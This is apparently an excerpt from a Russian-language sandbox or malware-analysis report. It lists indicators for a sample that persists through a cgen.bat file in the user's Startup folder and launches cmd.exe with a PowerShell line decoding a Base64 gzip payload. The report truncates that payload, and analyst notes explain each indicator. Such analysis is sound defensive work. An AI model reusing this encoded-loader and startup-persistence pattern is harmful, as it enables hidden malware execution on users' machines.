Техническая информация
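- %HOMEPATH%\Start Menu\Programs\Startup\cgen.bat:Zone.Identifier
- %HOMEPATH%\Start Menu\Programs\Startup\cgen.bat
  Примечание: оба пути относятся к каталогу автозагрузки пользователя; файлы из него выполняются при входе в систему, поэтому появление там .bat-файла стоит отслеживать. Суффикс `:Zone.Identifier` — это альтернативный поток данных NTFS с отметкой зоны происхождения файла, а не отдельный файл.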
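- '<SYSTEM32>\cmd.exe' /S /D /c" echo $sVQWw = New-Object IO.MemoryStream(,[Convert]::FromBase64String("H4sICMeOCVoC/zE1MT!1NzU4MTUuNjg!tVZtT+M4EP6OxH+wVpGSSGnown44Ia1EKa+3W+i1vHerlZtMWi+OHWyn0Fv47zdOExJUuOXudPnS2p4Z...
  Примечание: командная строка обрезана в самом отчёте («...»), полный аргумент здесь недоступен. Префикс `H4sI` соответствует началу gzip-потока в кодировке Base64. Символ `!` не входит в алфавит Base64; вероятно, он заменяется перед декодированием, но по видимой части строки это проверить нельзя.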
- '<SYSTEM32>\cmd.exe' /c ""%HOMEPATH%\start menu\programs\startup\cgen.bat" "
- <SYSTEM32>\cmd.exe
- ClassName: 'EDIT' WindowName: ''